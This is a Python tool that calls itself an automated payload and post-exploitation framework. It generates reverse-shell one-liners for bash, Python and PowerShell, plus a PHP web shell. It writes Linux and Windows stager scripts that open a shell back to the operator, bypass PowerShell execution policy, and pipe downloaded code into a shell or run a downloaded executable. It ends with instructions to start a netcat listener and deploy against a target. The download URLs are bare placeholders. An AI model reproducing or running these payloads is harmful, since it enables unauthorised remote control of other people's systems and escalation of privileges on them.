#!/usr/bin/env python3
import sys
import os
import re
import socket
from datetime import datetime

OLLAMA_URL = "http://localhost:11434/api/generate"

BANNER = r"""
=========================================================================================================
 ╔██████╗███████╗ ██████╗████████╗██╗   ██╗███╗   ███╗███████╗███████╗███╗   ███╗██████╗ ██████╗  █████╗ 
 ██╔════╝██╔════╝██╔════╝╚══██╔══╝██║   ██║████╗ ████║██╔════╝██╔════╝████╗ ████║██╔══██╗██╔══██╗██╔══██╗
 ███████╗█████╗  ██║        ██║   ██║   ██║██╔████╔██║███████╗█████╗  ██╔████╔██║██████╔╝██████╔╝███████║
 ╚════██║██╔══╝  ██║        ██║   ██║   ██║██║╚██╔╝██║╚════██║██╔══╝  ██║╚██╔╝██║██╔═══╝ ██╔══██╗██╔══██║
 ███████║███████╗╚██████╗   ██║   ╚██████╔╝██║ ╚═╝ ██║███████║███████╗██║ ╚═╝ ██║██║     ██║  ██║██║  ██║
 ╚══════╝╚══════╝ ╚═════╝   ╚═╝    ╚═════╝ ╚═╝     ╚═╝╚══════╝╚══════╝╚═╝     ╚═╝╚═╝     ╚═╝  ╚═╝╚═╝  ╚═╝
=========================================================================================================
 [*] Automated Payload & Post-Exploitation Framework
=========================================================================================================
"""

def print_banner():
    print(BANNER)

def get_attack_ip():
    """Dynamically detects local tunnel interface (tun0) or safe LAN fallback route."""
    try:
        import netifaces
        if 'tun0' in netifaces.interfaces():
            return netifaces.ifaddresses('tun0')[socket.AF_INET]['addr']
    except Exception:
        pass
    
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.connect(("10.10.10.10", 80))
        ip_tuple = s.getsockname()
        s.close()
        return ip_tuple[0]
    except Exception:
        return "YOUR_ATTACK_IP"

def generate_payloads(target_ip, attack_ip, lport):
    """Generates precise, multi-platform staging and listener vectors."""
    payloads = {
        "linux_bash": f"bash -i >& /dev/tcp/{attack_ip}/{lport} 0>&1",
        "linux_python": f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{attack_ip}\",{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(\"bash\")'",
        "windows_powershell": f"$c = New-Object System.Net.Sockets.TCPClient('{attack_ip}',{lport});$s = $c.GetStream();[byte[]]$b = 0..65535|%{{0}};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){{;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ' + $attack_ip + '$ ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sendbyte,0,$sendbyte.Length);$s.Flush()}}",
        "php_web": "<?php system($_GET['cmd']); ?>"
    }
    return payloads

def write_linux_payload(target_ip, payloads, lport):
    """Compiles the standalone Linux automated execution stager script."""
    filename = f"payload_linux_{target_ip.replace('.', '_')}.sh"
    try:
        with open(filename, "w", encoding="utf-8") as f:
            f.write("#!/bin/bash\n")
            f.write("# ========================================================\n")
            f.write(f"# AUTOMATED LINUX TARGET STAGER GENERATED BY SECTUMSEMPRA\n")
            f.write(f"# TARGET CONFIGURATION: {target_ip}\n")
            f.write("# ========================================================\n\n")
            f.write("echo '[*] Executing Linux administrative stager sequence...'\n")
            f.write(f"echo 'Launching interactive shell connection back to port {lport}...'\n\n")
            
            # Startar din reverse shell i bakgrunden så att stagen kan rulla vidare
            f.write(f"{payloads['linux_bash']} &\n\n")
            
            # Dynamiskt inbakad stager som laddar ner och kör LinPEAS i minnet
            f.write("echo '[*] Execution window active. Injecting live privilege audit directly into memory...'\n")
            f.write("curl -sL https://github.com | sh\n")
        return filename
    except Exception:
        return False

def write_windows_payload(target_ip, payloads, lport):
    """Compiles the standalone Windows PowerShell automated execution stager script."""
    filename = f"payload_windows_{target_ip.replace('.', '_')}.ps1"
    try:
        with open(filename, "w", encoding="utf-8") as f:
            f.write("# ========================================================\n")
            f.write(f"# AUTOMATED WINDOWS TARGET STAGER GENERATED BY SECTUMSEMPRA\n")
            f.write(f"# TARGET CONFIGURATION: {target_ip}\n")
            f.write("# ========================================================\n\n")
            f.write("Set-ExecutionPolicy Bypass -Scope Process -Force\n\n")
            f.write("Write-Host '[*] Initializing multi-platform compilation matrix...' -ForegroundColor Cyan\n")
            
            # Startar din Windows reverse shell loop
            f.write(f"{payloads['windows_powershell']}\n\n")
            
            # Post-Exploitation live memory stager för WinPEAS
            f.write("Write-Host '[*] Session stabilized. Injecting local environment diagnostics...' -ForegroundColor Cyan\n")
            f.write("pwsh -Command \"Invoke-WebRequest -Uri 'https://github.com' -OutFile 'winpeas.exe'; .\\winpeas.exe; Remove-Item .\\winpeas.exe -Force\"\n")
        return filename
    except Exception:
        return False

def main():
    print_banner()
    print(" >>> Sectumsempra v1.0 - Automated Payload & Post-Exploitation Engine <<<")
    
    attack_ip = get_attack_ip()
    print(f"[*] Engine Status: Tactical Staging Module ONLINE (Host IP: {attack_ip})")
    
    print("Enter Target IP (from NetWeave): ", end="")
    target_ip = input().strip()
    if not target_ip: return
    
    print("Set Local Listener Port (LPORT) [Default 4444]: ", end="")
    lport_input = input().strip()
    lport = int(lport_input) if lport_input else 4444
    
    print("\n[*] Initializing multi-platform compilation matrix...")
    payloads = generate_payloads(target_ip, attack_ip, lport)
    
    linux_file = write_linux_payload(target_ip, payloads, lport)
    win_file = write_windows_payload(target_ip, payloads, lport)
    
    if linux_file and win_file:
        print("\n" + "="*16 + " SECTUMSEMPRA: PAYLOAD GENERATION COMPLETE " + "="*15)
        print(f"[███] Linux Administration Script Ready:   {os.getcwd()}/{linux_file} 🔥")
        print(f"[███] Windows PowerShell Automation Ready: {os.getcwd()}/{win_file} 🔥")
        print("="*74)
        print(f"\n[!] Standard operational instructions:")
        print(f" 1. Open a new terminal tab and start your handler socket: nc -lvnp {lport}")
        print(f" 2. Deploy your generated script file against the target entry point verified by NetWeave.")
        print(f" 3. Once inside, the embedded live diagnostics routine maps out privilege escalation paths automatically.")
    else:
        print("\n[-] Error: Failed to write automated deployment scripts to current directory structure.")

if __name__ == "__main__":
    main()
